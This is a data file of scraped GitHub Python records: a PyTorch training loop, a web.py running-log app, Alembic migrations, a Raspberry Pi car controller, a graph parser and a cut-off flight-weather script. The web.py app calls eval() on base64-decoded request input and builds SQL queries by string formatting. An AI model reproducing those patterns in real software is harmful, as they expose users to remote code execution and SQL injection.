ax2, ax3) = plt.subplots(1, 3, figsize=(20, 10))\n ax1.imshow(convert_tensor_to_im(val_im[0]))\n ax2.imshow(convert_tensor_to_im(val_label[0], reduce_channel_dim=True))\n ax3.imshow(convert_tensor_to_im(output[0], reduce_channel_dim=True))\n plt.show()\n\n losses_train.append(loss_train.item())\n \ntorch.save(net.state_dict(), 'model.pth')\ntorch.save(optim.state_dict(), 'optimizer.pth')\n\n\n\n\n\n\n", "repo_name": "MateuszFlo/PhotoRoom", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2850, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.cuda.is_available", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 24, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 34, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 34, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 34, "usage_type": "call"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 35, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 35, "usage_type": "name"}, {"api_name": "dataloader.FacialDetection.FacialDetectionDataset", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.utils.data.random_split", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 41, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 49, "usage_type": "call"}, {"api_name": "networks.fcn.Pooled_FCN2D", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 58, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "utils.image_processing.convert_tensor_to_im", "line_number": 84, "usage_type": "call"}, {"api_name": "utils.image_processing.convert_tensor_to_im", "line_number": 85, "usage_type": "call"}, {"api_name": "utils.image_processing.convert_tensor_to_im", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 92, "usage_type": "call"}]}
+{"seq_id": "1970920636", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom urllib.request import urlopen\nimport json\nfrom pprint import pprint\nimport web\nimport pymysql\nimport time\nimport base64\nimport config as c\nfrom qiniu import Auth, put_file, etag, urlsafe_base64_encode\nimport qiniu.config\nrender = web.template.render('templates/')\nurls= (\n '/hello(.*)','hello',\n '/test(.*)','test',\n '/refer(.*)', 'refer',\n '/refer(.*)', 'refer',\n '/user(.*)','user',\n '/(.*)','index',\n )\n\n\n\napp= web.application(urls,globals())\n\n\ndef conSQL():\n conn = pymysql.connect(host='localhost', user=c.mysql_user, passwd=c.mysql_pass, db='db_run', port=3306, charset='utf8')\n\n return conn\n\n\nclass index:\n def GET(self,name):\n print('haha')\n\nclass user:\n def GET(self, name):\n conn = conSQL()\n cur = conn.cursor() # 获取一个游标\n cur.execute('SELECT u.id,u.nickname,u.realname,u.money,sum(r.length) length ,COUNT(r.id) cou FROM (\\\n SELECT u.id,u.nickname,u.realname,sum(m.money) money \\\n FROM `User` u, Money m WHERE u.id = m.user_id GROUP BY u.id) \\\n u,Run r WHERE u.id = r.user_id GROUP BY u.id')\n data = cur.fetchall()\n #print(data)\n return render.user(data)\n\n#跑步数据写入数据库\ndef SQL_refer(data):\n #print(data['hour'])\n time = int(data['hour'])*60*60 + int(data['minute'])*60 + int(data['second'])\n print(time)\n conn = conSQL()\n cur = conn.cursor() # 获取一个游标\n cur.execute(\"INSERT INTO `Run` (`id`, `user_id`, `time`, `length`, `img`, `date`) \\\n VALUES (NULL,'%d','%d','%f','%s','%d')\" \\\n %(int(data['user_id']),time,float(data['lenth']),data['key'],int(data['date'])))\n conn.commit()\n print(time)\n #int(data['user_id']),time,float(data['lenth']),data['key'],int(data['date'])\n\n\nclass refer:\n\n def GET(self,name):\n try:\n i = web.input()\n data = base64.b64decode(i.upload_ret).decode('ascii')\n data = eval(data)\n print(data)\n SQL_refer(data)\n except:\n print('11')\n\n # 需要填写你的 Access Key 和 Secret Key\n access_key = c.access_key\n secret_key = c.secret_key\n # 构建鉴权对象\n q = Auth(access_key, secret_key)\n # 要上传的空间\n bucket_name = c.bucket_name\n # 上传到七牛后保存的文件名\n date = int(time.time())\n key = str(int(time.time())) + '.png';\n # 生成上传 Token,可以指定过期时间等\n token = q.upload_token(bucket_name, key, 3600, {'returnUrl':'http://127.0.0.1:8080/refer', 'returnBody': '{\"user_id\": $(x:user_id),\"hour\": $(x:hour),\"minute\": $(x:minute),\"second\": $(x:second), \"key\": $(key),\"lenth\":$(x:lenth),\"date\":$(x:date)}'})\n return render.refer(key,token,date)\n\n def POST(self, name):\n\n print('111')\n #return render.refer()\nclass test:\n def GET(self, name):\n\n return render.test()\nif __name__== \"__main__\":\n app.run()", "repo_name": "david10088/wnt_run_python", "sub_path": "index.py", "file_name": "index.py", "file_ext": "py", "file_size_in_byte": 3075, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "web.template.render", "line_number": 14, "usage_type": "call"}, {"api_name": "web.template", "line_number": 14, "usage_type": "attribute"}, {"api_name": "web.application", "line_number": 26, "usage_type": "call"}, {"api_name": "pymysql.connect", "line_number": 30, "usage_type": "call"}, {"api_name": "config.mysql_user", "line_number": 30, "usage_type": "attribute"}, {"api_name": "config.mysql_pass", "line_number": 30, "usage_type": "attribute"}, {"api_name": "web.input", "line_number": 70, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 71, "usage_type": "call"}, {"api_name": "config.access_key", "line_number": 79, "usage_type": "attribute"}, {"api_name": "config.secret_key", "line_number": 80, "usage_type": "attribute"}, {"api_name": "qiniu.Auth", "line_number": 82, "usage_type": "call"}, {"api_name": "config.bucket_name", "line_number": 84, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 86, "usage_type": "call"}, {"api_name": "time.time", "line_number": 87, "usage_type": "call"}]}
+{"seq_id": "73341814807", "text": "\"\"\"Make equipment types global\n\nRevision ID: 27c45c384d65\nRevises: 0117bd0fa784\nCreate Date: 2018-10-24 14:24:46.437709\n\"\"\"\n\nimport sqlalchemy as sa\nfrom alembic import context, op\n\n\n# revision identifiers, used by Alembic.\nrevision = '27c45c384d65'\ndown_revision = '0117bd0fa784'\nbranch_labels = None\ndepends_on = None\n\n\ndef _make_names_unique():\n conn = op.get_bind()\n default_location_id = conn.execute('SELECT id FROM roombooking.locations WHERE is_default').scalar()\n if default_location_id is None:\n has_dupes = conn.execute('SELECT COUNT(DISTINCT name) != COUNT(name) FROM roombooking.equipment_types').scalar()\n if has_dupes:\n raise Exception('Please set a default location or remove equipment types whose names are not unique '\n 'across locations')\n return\n res = conn.execute('''\n SELECT eq.id, eq.name, loc.name AS location\n FROM roombooking.equipment_types eq\n JOIN roombooking.locations loc ON (loc.id = eq.location_id)\n WHERE eq.location_id != %s\n ''', (default_location_id,))\n for row in res:\n conflict = conn.execute('SELECT COUNT(*) FROM roombooking.equipment_types WHERE id != %s AND name = %s',\n (row.id, row.name)).scalar()\n if conflict:\n new_name = f'{row.name} ({row.location})'\n conn.execute('UPDATE roombooking.equipment_types SET name = %s WHERE id = %s', (new_name, row.id))\n\n\ndef upgrade():\n if context.is_offline_mode():\n raise Exception('This upgrade is only possible in online mode')\n _make_names_unique()\n op.drop_index('ix_equipment_types_name', table_name='equipment_types', schema='roombooking')\n op.drop_constraint('uq_equipment_types_name_location_id', 'equipment_types', schema='roombooking')\n op.create_index(None, 'equipment_types', ['name'], unique=True, schema='roombooking')\n op.drop_column('equipment_types', 'location_id', schema='roombooking')\n\n\ndef downgrade():\n if context.is_offline_mode():\n raise Exception('This downgrade is only possible in online mode')\n conn = op.get_bind()\n default_location_id = conn.execute('SELECT id FROM roombooking.locations WHERE is_default').scalar()\n if default_location_id is None:\n if conn.execute('SELECT COUNT(*) FROM roombooking.locations').scalar():\n raise Exception('Please set a default location')\n default_location = str(default_location_id) if default_location_id is not None else None\n op.add_column('equipment_types', sa.Column('location_id', sa.Integer(), nullable=False,\n server_default=default_location),\n schema='roombooking')\n op.alter_column('equipment_types', 'location_id', server_default=None, schema='roombooking')\n op.create_foreign_key(None, 'equipment_types', 'locations', ['location_id'], ['id'],\n source_schema='roombooking', referent_schema='roombooking')\n op.drop_index('ix_uq_equipment_types_name', table_name='equipment_types', schema='roombooking')\n op.create_unique_constraint(None, 'equipment_types', ['name', 'location_id'], schema='roombooking')\n op.create_index(None, 'equipment_types', ['name'], schema='roombooking')\n", "repo_name": "indico/indico", "sub_path": "indico/migrations/versions/20181024_1424_27c45c384d65_make_equipment_types_global.py", "file_name": "20181024_1424_27c45c384d65_make_equipment_types_global.py", "file_ext": "py", "file_size_in_byte": 3279, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1560, "dataset": "github-code", "pt": "31", "api": [{"api_name": "alembic.op.get_bind", "line_number": 20, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 20, "usage_type": "name"}, {"api_name": "alembic.context.is_offline_mode", "line_number": 43, "usage_type": "call"}, {"api_name": "alembic.context", "line_number": 43, "usage_type": "name"}, {"api_name": "alembic.op.drop_index", "line_number": 46, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 46, "usage_type": "name"}, {"api_name": "alembic.op.drop_constraint", "line_number": 47, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 47, "usage_type": "name"}, {"api_name": "alembic.op.create_index", "line_number": 48, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 48, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 49, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 49, "usage_type": "name"}, {"api_name": "alembic.context.is_offline_mode", "line_number": 53, "usage_type": "call"}, {"api_name": "alembic.context", "line_number": 53, "usage_type": "name"}, {"api_name": "alembic.op.get_bind", "line_number": 55, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 55, "usage_type": "name"}, {"api_name": "alembic.op.add_column", "line_number": 61, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 61, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 61, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 61, "usage_type": "call"}, {"api_name": "alembic.op.alter_column", "line_number": 64, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 64, "usage_type": "name"}, {"api_name": "alembic.op.create_foreign_key", "line_number": 65, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 65, "usage_type": "name"}, {"api_name": "alembic.op.drop_index", "line_number": 67, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 67, "usage_type": "name"}, {"api_name": "alembic.op.create_unique_constraint", "line_number": 68, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 68, "usage_type": "name"}, {"api_name": "alembic.op.create_index", "line_number": 69, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 69, "usage_type": "name"}]}
+{"seq_id": "16571600411", "text": "import RPi.GPIO as GPIO\nimport time\nfrom django.http import HttpResponse\nfrom django.shortcuts import redirect\n\n\"\"\"\n * |==================================================|\n * |======This code created by K.J. Chen(陳冠儒)======|\n * |=Copyright © 2019 K.J. Chen | All Rights Reserved=|\n * |==================================================|\n\"\"\"\n\n\nclass CarRun:\n def __init__(self, dt = 3):\n self.dt = dt # Delaytime\n global IN\n IN = [20, 21, 19, 26]\n global EN_A\n EN_A = 16\n global EN_B\n EN_B = 13\n \"\"\"\n global key\n key = 8\n \"\"\"\n global AvoidSensorLeft\n AvoidSensorLeft = 12\n global AvoidSensorRight\n AvoidSensorRight = 17\n\n #def __new__(self, dt = 1):\n GPIO.setmode(GPIO.BCM)\n GPIO.setwarnings(False)\n\n # def __call__(self):\n # return redirect(\"javascript:window.close();\")\n # #return HttpResponse(' ')\n\n def motor_init(self):\n global pwm_EN_A\n global pwm_EN_B\n\n for i in range(4):\n GPIO.setup(IN[i], GPIO.OUT, initial = 0)\n\n GPIO.setup(EN_A, GPIO.OUT, initial = 1)\n pwm_EN_A = GPIO.PWM(EN_A, 2000)\n pwm_EN_A.start(0)\n\n GPIO.setup(EN_B, GPIO.OUT, initial = 1)\n pwm_EN_B = GPIO.PWM(EN_B, 2000)\n pwm_EN_B.start(0)\n\n #GPIO.setup(key,GPIO.IN)\n GPIO.setup(AvoidSensorLeft,GPIO.IN)\n GPIO.setup(AvoidSensorRight,GPIO.IN)\n\n @staticmethod\n def brake(dt = 1):\n for i in range(4):\n GPIO.output(IN[i], 0)\n\n pwm_EN_A.ChangeDutyCycle(80)\n pwm_EN_B.ChangeDutyCycle(80)\n\n time.sleep(dt)\n\n # Go Advance\n def advance(self, request, b_k = 0):\n dt = self.dt\n for i in range(4):\n t = i%2 == 0\n #t = 1\n GPIO.output(IN[i], t)\n\n pwm_EN_A.ChangeDutyCycle(80)\n pwm_EN_B.ChangeDutyCycle(80)\n\n time.sleep(self.dt)\n if b_k == 0:\n self.brake()\n return HttpResponse(\"Go Advance\")\n #self.request = request\n\n # Go Back\n def back(self, request, b_k = 0):\n for i in range(4):\n t = i%2 == 1\n # t = 0\n GPIO.output(IN[i], t)\n\n pwm_EN_A.ChangeDutyCycle(80)\n pwm_EN_B.ChangeDutyCycle(80)\n\n time.sleep(self.dt)\n if b_k == 0:\n self.brake()\n return HttpResponse(\"Go Back\")\n #self.request = request\n\n # Turn Left\n def left(self, request, b_k = 0):\n for i in range(4):\n t = i == 2\n GPIO.output(IN[i], t)\n\n pwm_EN_A.ChangeDutyCycle(80)\n pwm_EN_B.ChangeDutyCycle(80)\n\n time.sleep(self.dt)\n if b_k == 0:\n self.brake()\n return HttpResponse(\"Turn Left\")\n #self.request = request\n\n # Turn Right\n def right(self, request, b_k = 0):\n for i in range(4):\n t = i == 0\n GPIO.output(IN[i], t)\n\n pwm_EN_A.ChangeDutyCycle(80)\n pwm_EN_B.ChangeDutyCycle(80)\n\n time.sleep(self.dt)\n if b_k == 0:\n self.brake()\n return HttpResponse(\"Turn Right\")\n #self.request = request\n\n # Turn Left in Situ\n def situ_left(self, request, b_k = 0):\n for i in range(4):\n t = i in [1, 2]\n GPIO.output(IN[i], t)\n\n pwm_EN_A.ChangeDutyCycle(80)\n pwm_EN_B.ChangeDutyCycle(80)\n\n time.sleep(self.dt)\n if b_k == 0:\n self.brake()\n return HttpResponse(\"Turn Left in Situ\")\n #self.request = request\n\n # Turn Right in Situ\n def situ_right(self, request, b_k = 0):\n for i in range(4):\n t = i in [0, 3]\n GPIO.output(IN[i], t)\n\n pwm_EN_A.ChangeDutyCycle(80)\n pwm_EN_B.ChangeDutyCycle(80)\n\n time.sleep(self.dt)\n if b_k == 0:\n self.brake()\n return HttpResponse(\"Turn Right in Situ\")\n #self.request = request\n\n # Infrared Avoid\n # def infrared_avoid(self, request):\n # i = None\n # while i == None:\n # LeftSensorValue = GPIO.input(AvoidSensorLeft)\n # RightSensorValue = GPIO.input(AvoidSensorRight)\n #\n # if LeftSensorValue == True and RightSensorValue == True:\n # run()\n # elif LeftSensorValue == False and RightSensorValue == True:\n # spin_right()\n # time.sleep(0.002)\n # elif LeftSensorValue == True and RightSensorValue == False:\n # spin_left()\n # time.sleep(0.002)\n # return HttpResponse(\"Infrared Avoid\")\n\n # Stop to Run the Car\n def stop_run(self, request):\n self.brake()\n return HttpResponse(\"Stop to Run the Car\")\n #self.request = request\n\n # End Control\n def all_stop(self, request):\n self.request = request\n pwm_EN_A.stop()\n pwm_EN_A.stop()\n\n GPIO.cleanup()\n return HttpResponse(\"End Control\")\n", "repo_name": "darren-k-chen/PiConsole", "sub_path": "home/car_control/run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 4971, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "RPi.GPIO.setmode", "line_number": 33, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 33, "usage_type": "name"}, {"api_name": "RPi.GPIO.BCM", "line_number": 33, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setwarnings", "line_number": 34, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 34, "usage_type": "name"}, {"api_name": "RPi.GPIO.setup", "line_number": 45, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 45, "usage_type": "name"}, {"api_name": "RPi.GPIO.OUT", "line_number": 45, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setup", "line_number": 47, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 47, "usage_type": "name"}, {"api_name": "RPi.GPIO.OUT", "line_number": 47, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.PWM", "line_number": 48, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 48, "usage_type": "name"}, {"api_name": "RPi.GPIO.setup", "line_number": 51, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 51, "usage_type": "name"}, {"api_name": "RPi.GPIO.OUT", "line_number": 51, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.PWM", "line_number": 52, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 52, "usage_type": "name"}, {"api_name": "RPi.GPIO.setup", "line_number": 56, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 56, "usage_type": "name"}, {"api_name": "RPi.GPIO.IN", "line_number": 56, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setup", "line_number": 57, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 57, "usage_type": "name"}, {"api_name": "RPi.GPIO.IN", "line_number": 57, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.output", "line_number": 62, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 62, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 67, "usage_type": "call"}, {"api_name": "RPi.GPIO.output", "line_number": 75, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 75, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 80, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 83, "usage_type": "call"}, {"api_name": "RPi.GPIO.output", "line_number": 91, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 91, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 96, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 99, "usage_type": "call"}, {"api_name": "RPi.GPIO.output", "line_number": 106, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 106, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 111, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 114, "usage_type": "call"}, {"api_name": "RPi.GPIO.output", "line_number": 121, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 121, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 126, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 129, "usage_type": "call"}, {"api_name": "RPi.GPIO.output", "line_number": 136, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 136, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 141, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 144, "usage_type": "call"}, {"api_name": "RPi.GPIO.output", "line_number": 151, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 151, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 156, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 159, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 182, "usage_type": "call"}, {"api_name": "RPi.GPIO.cleanup", "line_number": 191, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 191, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 192, "usage_type": "call"}]}
+{"seq_id": "17630731336", "text": "\"\"\"add relationship btw comment and user\n\nRevision ID: fdcf61ab1711\nRevises: 7fa77002d3cb\nCreate Date: 2020-01-20 09:19:06.902255\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'fdcf61ab1711'\ndown_revision = '7fa77002d3cb'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('blogs', sa.Column('posted', sa.DateTime(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('blogs', 'posted')\n # ### end Alembic commands ###\n", "repo_name": "trevor-ngugi/Drew-Of-Lines", "sub_path": "migrations/versions/fdcf61ab1711_add_relationship_btw_comment_and_user.py", "file_name": "fdcf61ab1711_add_relationship_btw_comment_and_user.py", "file_ext": "py", "file_size_in_byte": 676, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op.drop_column", "line_number": 27, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 27, "usage_type": "name"}]}
+{"seq_id": "71244441049", "text": "import json\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport pydotplus\nfrom buf import Buf\nfrom accessor import Accessor\n\nclass Parser():\n\n\tdef addNodes(self,currNode,parent):\n\t\t#print(\"test\");\n\t\t#print(currNode);\n\t\taL = [];\n\t\tself.G.add_node(currNode,overflowFlag = False, accessor = '', buffer = '', line=self.data[currNode]['nodeName']['line#']);\n\t\tif(self.data[currNode]['accessors']['vars'] != ''):\n\t\t\ttempAcc = Accessor(self.data[currNode]['accessors']['vars'], self.data[currNode]['accessors']['maxValues']);\n\t\t\tself.G.add_node(currNode,accessor = tempAcc);\n\t\tif(self.data[currNode]['bufField']['accessors'] != ''):\n\t\t\ttempVars = self.data[currNode]['bufField']['accessors'].split(',');\n\t\t\tfor i in range(len(tempVars)):\n\t\t\t\taL.append(Accessor(tempVars[i],\"\"));\n\t\t\ttempBuffer = Buf(aL,self.data[currNode]['bufField']['size'],self.data[currNode]['bufField']['expression'],self.data[currNode]['bufField']['type']);\n\t\t\tself.G.add_node(currNode,buffer = tempBuffer);\n\t\t\t\n\t\t\n\t\tif(parent != ''):\n\t\t\tself.G.add_edge(parent,currNode);\n\t\tif(self.data[currNode]['children']['taken'] == '') and (self.data[currNode]['children']['nTaken'] == ''):\n\t\t\tself.G.add_node('end',overflowFlag = False, accessor = '', buffer = '',line ='');\n\t\t\tself.G.add_edge(currNode,'end');\n\t\t\treturn;\n\t\tparent = currNode;\n\t\tcurrNode = 'node'+self.data[currNode]['children']['taken'];\n\t\tself.addNodes(currNode,parent);\n\t\tif(self.data[currNode]['children']['nTaken'] != ''):\n\t\t\tparent = currNode;\n\t\t\tcurrNode = 'node'+self.data[currNode]['children']['nTaken'];\n\t\t\tself.addNodes(currNode,parent);\n\t\t\t\n\t\t\t\n\tdef __init__(self, file):\n\t\twith open(file) as data_file: \n\t\t\tself.data = json.load(data_file);\n\t\tself.G = nx.DiGraph();\n\t\t#self.G.add_node(self.data['root']['nodeName']['line#']);\n\t\tself.addNodes('root','');\n\t\t#print(self.G.nodes());\n\t\t#print(self.G.edges());\n\t\t\n\t\n\t\n\t\t\n\t\n \ndef main():\n\tparser = Parser(\"../assets/stack_overflow_1.json\");\n\tprint(parser.data['root']['children']['taken']);\n\tprint('');\n\tprint(len(parser.data['root']))\n\tprint(len(parser.data))\n\tprint(parser.G.node['node52']['buffer'].getAccessorList()[0].getVar());\n\t\n\tnx.nx_pydot.write_dot(parser.G,'test.dot');\n\tpos = nx.nx_pydot.graphviz_layout(parser.G, prog = 'dot');\n\tnx.draw(parser.G, pos, with_labels = True, arrows = True);\n\tplt.show();\n\t\nif __name__ == \"__main__\":\n main()\n", "repo_name": "grahonan/GPUsploit", "sub_path": "src/parser.py", "file_name": "parser.py", "file_ext": "py", "file_size_in_byte": 2344, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "accessor.Accessor", "line_number": 16, "usage_type": "call"}, {"api_name": "accessor.Accessor", "line_number": 21, "usage_type": "call"}, {"api_name": "buf.Buf", "line_number": 22, "usage_type": "call"}, {"api_name": "json.load", "line_number": 43, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 44, "usage_type": "call"}, {"api_name": "networkx.nx_pydot.write_dot", "line_number": 63, "usage_type": "call"}, {"api_name": "networkx.nx_pydot", "line_number": 63, "usage_type": "attribute"}, {"api_name": "networkx.nx_pydot.graphviz_layout", "line_number": 64, "usage_type": "call"}, {"api_name": "networkx.nx_pydot", "line_number": 64, "usage_type": "attribute"}, {"api_name": "networkx.draw", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}]}
+{"seq_id": "10752777935", "text": "import csv\nimport os\nimport datetime\nfrom multiprocessing import Pool\nimport uuid\nimport time\nimport json\nimport requests\nimport random\n\n# Filepaths\npath = os.path.abspath(os.path.dirname(__file__))\n# relative path to the data folder\npath += '/../data'\n\n# Do whatever you need to do with the row data in here\ndef row_handler(row):\n # since I used dictReader each row is now formatted in a dictionary so you can get \n # values by the names at the top of the columns, that'll make it much simpler\n origin = row['ORIGIN']\n dest = row['DEST']\n\n # Zero out negative delay values\n delay = 0 if int(row[\"CRS_DEP_TIME\"]) < 0 else row[\"CRS_DEP_TIME\"]\n\n # Pre-process time\n time_raw = row[\"CRS_DEP_TIME\"]\n while len(time_raw) < 4:\n time_raw = \"0\" + time_raw\n\n # Create naive date objects \n date_obj = datetime.datetime.strptime(row[\"FL_DATE\"] + \"\\t\" + time_raw, \"%Y-%m-%d\\t%H%M\")\n\n # Get weather data\n weather_origin = get_weather_data(origin, date_obj)\n\n weather_dest = get_weather_data(dest, date_obj)\n\n try:\n processedTime = weather_origin[\"processedTime\"]\n except:\n print(json.dumps(weather_origin.json(), indent=4) + \" \" + str(origin) + str(date_obj))\n\n try:\n precip_type_orig = \"N/A\" if weather_origin[\"weather\"][\"precipIntensity\"] == 0 else weather_origin[\"weather\"][\"precipType\"]\n precip_type_dest = \"N/A\" if weather_dest[\"weather\"][\"precipIntensity\"] == 0 else weather_dest[\"weather\"][\"precipType\"]\n except:\n time.sleep(5)\n precip_type_orig = \"N/A\" if weather_origin[\"weather\"][\"precipIntensity\"] == 0 else weather_origin[\"weather\"][\"precipType\"]\n precip_type_dest = \"N/A\" if weather_dest[\"weather\"][\"precipIntensity\"] == 0 else weather_dest[\"weather\"][\"precipType\"]\n\n # Parse dst\n dst = 1 if weather_origin[\"processedTime\"][\"dst\"] == \"true\" else 0\n\n #origin_bearing = \"N/A\" if weather_origin[\"weather\"][\"windSpeed\"] == None or weather_origin[\"weather\"][\"windSpeed\"] == 0 else weather_origin[\"weather\"][\"windBearing\"]\n #dest_bearing = \"N/A\" if weather_origin[\"weather\"][\"windSpeed\"] == None or weather_dest[\"weather\"][\"windSpeed\"] == 0 else weather_dest[\"weather\"][\"windBearing\"]\n\n\n return {'UTC_TIME':weather_origin[\"processedTime\"][\"time\"], \n 'CARRIER':row[\"UNIQUE_CARRIER\"], \n 'ORIGIN':origin, \n 'DEST':dest, \n 'DEP_DELAY':delay, \n 'CANCELLED':row['CANCELLED'],\n 'DST':dst,\n \"TEMP_ORIGIN\":weather_origin[\"weather\"][\"temperature\"], \n \"PRECIP_ORIGIN\":weather_origin[\"weather\"][\"precipIntensity\"], \n \"PRECIP_TYPE_ORIGIN\":precip_type_orig,\n #\"WIND_SPEED_ORIGIN\":weather_origin[\"weather\"][\"windSpeed\"], \n #\"WIND_BEARING_ORIGIN\":origin_bearing, \n #\"WIND_SPEED_DEST\":weather_dest[\"weather\"][\"windSpeed\"], \n #\"WIND_BEARING_DEST\":weather_dest, \n \"TEMP_DEST\":weather_dest[\"weather\"][\"temperature\"], \n \"PRECIP_DEST\":weather_dest[\"weather\"][\"precipIntensity\"],\n \"PRECIP_TYPE_DEST\":precip_type_dest\n }\n\ndef get_weather_data(iata, time):\n time = str(time)\n time = time[0:len(time) - 3]\n\n BASE_URL = \"http://localhost\"\n\n params = {'code':iata, 'time':time}\n\n res = requests.get(BASE_URL, params=params)\n #print(str(res.status_code) + \" \" + str(iata) + \" \" + str(time))\n \n return res.json()\n\n \n\n\nif __name__ == \"__main__\":\n for file in os.listdir(path):\n filename = os.path.join(path, file) #FIXME replace with 'file'\n outfilename = file + \"~processed\"\n with open(outfilename, mode=\"w+\", newline='') as 